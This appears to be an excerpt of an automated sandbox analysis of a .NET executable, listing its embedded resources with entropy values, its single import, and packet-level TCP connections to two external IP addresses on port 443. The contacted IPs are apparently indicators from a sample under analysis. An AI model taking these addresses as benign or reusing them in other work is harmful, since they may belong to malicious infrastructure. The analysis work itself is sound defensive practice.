RT_CURSOR	0x440c74	0x134	data	0.4642857142857143
RT_CURSOR	0x440da8	0x134	data	0.4805194805194805
RT_CURSOR	0x440edc	0x134	data	0.38311688311688313
RT_CURSOR	0x441010	0x134	data	0.36038961038961037
RT_CURSOR	0x441144	0x134	data	0.4090909090909091
RT_CURSOR	0x441278	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	0.4967532467532468
RT_BITMAP	0x4413ac	0x70	Device independent bitmap graphic, 16 x 16 x 1, image size 64	0.5
RT_BITMAP	0x44141c	0x70	Device independent bitmap graphic, 16 x 16 x 1, image size 64	0.36607142857142855
RT_BITMAP	0x44148c	0x4c	Device independent bitmap graphic, 4 x 7 x 1, image size 28	0.5394736842105263
RT_BITMAP	0x4414d8	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m	0.6745049504950495
RT_BITMAP	0x441800	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m	0.4962871287128713
RT_BITMAP	0x441b28	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m	0.6658415841584159
RT_BITMAP	0x441e50	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 2834 x 2834 px/m	0.4839108910891089
RT_BITMAP	0x442178	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240	0.34011627906976744
RT_BITMAP	0x4422d0	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240	0.2441860465116279
RT_BITMAP	0x442428	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240	0.32848837209302323
RT_BITMAP	0x442580	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240	0.25
RT_BITMAP	0x4426d8	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m	0.22277227722772278
RT_BITMAP	0x442a00	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m	0.18193069306930693
RT_BITMAP	0x442d28	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m	0.10148514851485149
RT_BITMAP	0x443050	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3779 x 3779 px/m	0.0655940594059406
RT_BITMAP	0x443378	0x508	Device independent bitmap graphic, 14 x 14 x 8, image size 224, resolution 3779 x 3779 px/m, 256 important colors	0.5419254658385093
RT_BITMAP	0x443880	0x508	Device independent bitmap graphic, 14 x 14 x 8, image size 224, resolution 3779 x 3779 px/m, 256 important colors	0.5403726708074534
RT_BITMAP	0x443d88	0x508	Device independent bitmap graphic, 14 x 14 x 8, image size 224, resolution 3779 x 3779 px/m, 256 important colors	0.5023291925465838
RT_BITMAP	0x444290	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.44396551724137934
RT_BITMAP	0x444378	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2851 x 2851 px/m, 256 important colors	0.15227272727272728
RT_BITMAP	0x4448a0	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2851 x 2851 px/m, 256 important colors	0.8234848484848485
RT_BITMAP	0x444dc8	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.40606060606060607
RT_BITMAP	0x4452f0	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.41439393939393937
RT_BITMAP	0x445818	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.43103448275862066
RT_BITMAP	0x445900	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.38362068965517243
RT_BITMAP	0x4459e8	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.4224137931034483
RT_BITMAP	0x445ad0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.4353448275862069
RT_BITMAP	0x445bb8	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.453030303030303
RT_BITMAP	0x4460e0	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.4356060606060606
RT_BITMAP	0x446608	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.40984848484848485
RT_BITMAP	0x446b30	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.403030303030303
RT_BITMAP	0x447058	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	0.5197368421052632
RT_BITMAP	0x4470f0	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	0.506578947368421
RT_BITMAP	0x447188	0x4ac	Device independent bitmap graphic, 11 x 11 x 8, image size 132, resolution 3779 x 3779 px/m, 256 important colors	0.11454849498327759
RT_BITMAP	0x447634	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.12623762376237624
RT_BITMAP	0x44795c	0x828	Device independent bitmap graphic, 32 x 32 x 8, image size 1024	0.25191570881226055
RT_BITMAP	0x448184	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.12376237623762376
RT_BITMAP	0x4484ac	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144, resolution 3779 x 3779 px/m, 256 important colors	0.11754966887417219
RT_BITMAP	0x448964	0x4ac	Device independent bitmap graphic, 11 x 11 x 8, image size 132, resolution 3779 x 3779 px/m, 256 important colors	0.07608695652173914
RT_BITMAP	0x448e10	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.12871287128712872
RT_BITMAP	0x449138	0x828	Device independent bitmap graphic, 32 x 32 x 8, image size 1024	0.25383141762452105
RT_BITMAP	0x449960	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.125
RT_BITMAP	0x449c88	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.13242574257425743
RT_BITMAP	0x449fb0	0x828	Device independent bitmap graphic, 32 x 32 x 8, image size 1024	0.2514367816091954
RT_BITMAP	0x44a7d8	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.12376237623762376
RT_BITMAP	0x44ab00	0x828	Device independent bitmap graphic, 32 x 32 x 8, image size 1024	0.3227969348659004
RT_BITMAP	0x44b328	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.4628787878787879
RT_BITMAP	0x44b850	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, 256 important colors	0.32954545454545453
RT_BITMAP	0x44bd78	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.43103448275862066
RT_BITMAP	0x44bf48	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	0.46487603305785125
RT_BITMAP	0x44c12c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.43103448275862066
RT_BITMAP	0x44c2fc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.39870689655172414
RT_BITMAP	0x44c4cc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.4245689655172414
RT_BITMAP	0x44c69c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.5021551724137931
RT_BITMAP	0x44c86c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.5064655172413793
RT_BITMAP	0x44ca3c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.39655172413793105
RT_BITMAP	0x44cc0c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.5344827586206896
RT_BITMAP	0x44cddc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	0.39655172413793105
RT_BITMAP	0x44cfac	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	0.5208333333333334
RT_BITMAP	0x44d06c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	0.42857142857142855
RT_BITMAP	0x44d14c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	0.4955357142857143
RT_BITMAP	0x44d22c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.40865384615384615
RT_BITMAP	0x44d2fc	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.4326923076923077
RT_BITMAP	0x44d3cc	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.3125
RT_BITMAP	0x44d49c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.3173076923076923
RT_BITMAP	0x44d56c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.38461538461538464
RT_BITMAP	0x44d63c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.3942307692307692
RT_BITMAP	0x44d70c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.40384615384615385
RT_BITMAP	0x44d7dc	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.40865384615384615
RT_BITMAP	0x44d8ac	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.3317307692307692
RT_BITMAP	0x44d97c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.34615384615384615
RT_BITMAP	0x44da4c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.39903846153846156
RT_BITMAP	0x44db1c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.39903846153846156
RT_BITMAP	0x44dbec	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.3701923076923077
RT_BITMAP	0x44dcbc	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.375
RT_BITMAP	0x44dd8c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.40865384615384615
RT_BITMAP	0x44de5c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.4423076923076923
RT_BITMAP	0x44df2c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.3798076923076923
RT_BITMAP	0x44dffc	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.375
RT_BITMAP	0x44e0cc	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.4567307692307692
RT_BITMAP	0x44e19c	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	0.4375
RT_BITMAP	0x44e26c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.3706896551724138
RT_BITMAP	0x44e354	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.375
RT_BITMAP	0x44e43c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.28448275862068967
RT_BITMAP	0x44e524	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.28448275862068967
RT_BITMAP	0x44e60c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.33189655172413796
RT_BITMAP	0x44e6f4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.34051724137931033
RT_BITMAP	0x44e7dc	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.36637931034482757
RT_BITMAP	0x44e8c4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.36637931034482757
RT_BITMAP	0x44e9ac	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.3103448275862069
RT_BITMAP	0x44ea94	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.3103448275862069
RT_BITMAP	0x44eb7c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.3620689655172414
RT_BITMAP	0x44ec64	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.35344827586206895
RT_BITMAP	0x44ed4c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.33620689655172414
RT_BITMAP	0x44ee34	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.33620689655172414
RT_BITMAP	0x44ef1c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.3577586206896552
RT_BITMAP	0x44f004	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.3620689655172414
RT_BITMAP	0x44f0ec	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.31896551724137934
RT_BITMAP	0x44f1d4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.31896551724137934
RT_BITMAP	0x44f2bc	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.41379310344827586
RT_BITMAP	0x44f3a4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, 16 important colors	0.3922413793103448
RT_BITMAP	0x44f48c	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.36666666666666664
RT_BITMAP	0x44f9b4	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	0.38392857142857145
RT_BITMAP	0x44fa94	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	0.4947916666666667
RT_BITMAP	0x44fb54	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	0.484375
RT_BITMAP	0x44fc14	0x208	Device independent bitmap graphic, 26 x 26 x 4, image size 416	0.29615384615384616
RT_BITMAP	0x44fe1c	0x208	Device independent bitmap graphic, 26 x 26 x 4, image size 416	0.29423076923076924
RT_BITMAP	0x450024	0x208	Device independent bitmap graphic, 26 x 26 x 4, image size 416	0.2846153846153846
RT_BITMAP	0x45022c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	0.42410714285714285
RT_BITMAP	0x45030c	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors	0.045454545454545456
RT_BITMAP	0x450834	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors	0.15606060606060607
RT_BITMAP	0x450d5c	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors	0.045454545454545456
RT_BITMAP	0x451284	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3780 x 3780 px/m, 256 important colors	0.07045454545454545
RT_BITMAP	0x4517ac	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	0.5104166666666666
RT_BITMAP	0x45186c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	0.5
RT_BITMAP	0x45194c	0x494	Device independent bitmap graphic, 9 x 9 x 8, image size 108	0.4257679180887372
RT_BITMAP	0x451de0	0x494	Device independent bitmap graphic, 9 x 9 x 8, image size 108	0.4249146757679181
RT_BITMAP	0x452274	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.4870689655172414
RT_BITMAP	0x45235c	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	0.4895833333333333
RT_BITMAP	0x45241c	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.16890243902439026
RT_BITMAP	0x452a84	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.19695121951219513
RT_BITMAP	0x4530ec	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.3176829268292683
RT_BITMAP	0x453754	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.28841463414634144
RT_BITMAP	0x453dbc	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576	0.32865853658536587
RT_BITMAP	0x454424	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.21707317073170732
RT_BITMAP	0x454a8c	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.2548780487804878
RT_BITMAP	0x4550f4	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 3779 x 3779 px/m, 256 important colors	0.3981707317073171
RT_BITMAP	0x45575c	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.2939024390243902
RT_BITMAP	0x455dc4	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 1728, resolution 2834 x 2834 px/m	0.22002262443438914
RT_BITMAP	0x4564ac	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 2834 x 2834 px/m, 256 important colors	0.21402439024390243
RT_BITMAP	0x456b14	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576	0.3280487804878049
RT_BITMAP	0x45717c	0x188	Device independent bitmap graphic, 24 x 24 x 4, image size 288	0.5153061224489796
RT_BITMAP	0x457304	0x6e8	Device independent bitmap graphic, 24 x 24 x 24, image size 1728, resolution 2834 x 2834 px/m	0.22002262443438914
RT_BITMAP	0x4579ec	0x188	Device independent bitmap graphic, 24 x 24 x 4, image size 288	0.39540816326530615
RT_BITMAP	0x457b74	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m	0.5678571428571428
RT_BITMAP	0x457da4	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m	0.5928571428571429
RT_BITMAP	0x457fd4	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m	0.5392857142857143
RT_BITMAP	0x458204	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520	0.29285714285714287
RT_BITMAP	0x458434	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520	0.2732142857142857
RT_BITMAP	0x458664	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520	0.2714285714285714
RT_BITMAP	0x458894	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m	0.44642857142857145
RT_BITMAP	0x458ac4	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m	0.4589285714285714
RT_BITMAP	0x458cf4	0x230	Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/m	0.45714285714285713
RT_BITMAP	0x458f24	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	0.4068181818181818
RT_BITMAP	0x45944c	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.6918316831683168
RT_BITMAP	0x459774	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.6089108910891089
RT_BITMAP	0x459a9c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.3922413793103448
RT_BITMAP	0x459b84	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.45689655172413796
RT_BITMAP	0x459c6c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.5689655172413793
RT_BITMAP	0x459d54	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.49137931034482757
RT_BITMAP	0x459e3c	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.8254950495049505
RT_BITMAP	0x45a164	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.5689655172413793
RT_BITMAP	0x45a24c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.46551724137931033
RT_BITMAP	0x45a334	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.6695544554455446
RT_BITMAP	0x45a65c	0xc028	Device independent bitmap graphic, 128 x 128 x 24, image size 49152	0.7487599609692633
RT_BITMAP	0x466684	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768	0.676980198019802
RT_BITMAP	0x4669ac	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	0.5517241379310345
RT_BITMAP	0x466a94	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	0.3794642857142857
RT_BITMAP	0x466b74	0x124	Device independent bitmap graphic, 9 x 9 x 24, image size 252, resolution 3779 x 3779 px/m	0.5993150684931506
RT_BITMAP	0x466c98	0x124	Device independent bitmap graphic, 9 x 9 x 24, image size 252, resolution 3779 x 3779 px/m	0.5924657534246576
RT_ICON	0x466dbc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.3696060037523452
RT_ICON	0x467e64	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.27728215767634856
RT_ICON	0x46a40c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.22626358053849788
RT_ICON	0x46e634	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.14613155092866437
RT_ICON	0x47ee5c	0x6226	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9980100294515641
RT_STRING	0x485084	0xbe	data	0.5052631578947369
RT_GROUP_CURSOR	0x485144	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.25
RT_GROUP_CURSOR	0x485158	0x14	data	1.3
RT_GROUP_CURSOR	0x48516c	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485180	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485194	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4851a8	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4851bc	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4851d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4851e4	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4851f8	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x48520c	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485220	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485234	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485248	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x48525c	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485270	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485284	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x485298	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4852ac	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4852c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4852d4	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4852e8	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_CURSOR	0x4852fc	0x14	Lotus unknown worksheet or configuration, revision 0x1	1.3
RT_GROUP_ICON	0x485310	0x4c	data	0.7894736842105263
RT_VERSION	0x48535c	0x3c0	data	0.3854166666666667
RT_MANIFEST	0x48571c	0x5a1	XML 1.0 document, ASCII text, with CRLF line terminators	0.4059680777238029

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 10:25:57.880947113 CEST	49675	443	192.168.2.5	23.1.237.91
May 24, 2024 10:25:57.880947113 CEST	49674	443	192.168.2.5	23.1.237.91
May 24, 2024 10:25:57.974555016 CEST	49673	443	192.168.2.5	23.1.237.91
May 24, 2024 10:26:01.052772045 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.052862883 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:01.052956104 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.054059029 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.054089069 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:01.542809010 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:01.542891979 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.546699047 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.546709061 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:01.547198057 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:01.599438906 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.746870041 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.746952057 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:01.747209072 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.139014959 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.139245033 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.139314890 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.144013882 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.144054890 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.144076109 CEST	49706	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.144084930 CEST	443	49706	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.162794113 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.162853956 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.162924051 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.163820028 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.163849115 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.735603094 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.735701084 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.738573074 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.738625050 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.739008904 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:02.740928888 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.740928888 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:02.741045952 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.484296083 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.488590956 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.488636971 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.488665104 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.488698006 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.488753080 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.497073889 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.508270979 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.508321047 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.508335114 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.508351088 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.508418083 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.513823986 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.513890982 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.513946056 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.513959885 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.518505096 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.518559933 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.518573999 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.518588066 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.518647909 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.518660069 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.518682957 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.518733025 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.518934965 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.518974066 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.519001007 CEST	49707	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.519013882 CEST	443	49707	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.561394930 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.561465025 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:03.561573029 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.561971903 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:03.562001944 CEST	443	49708	104.21.12.112	192.168.2.5
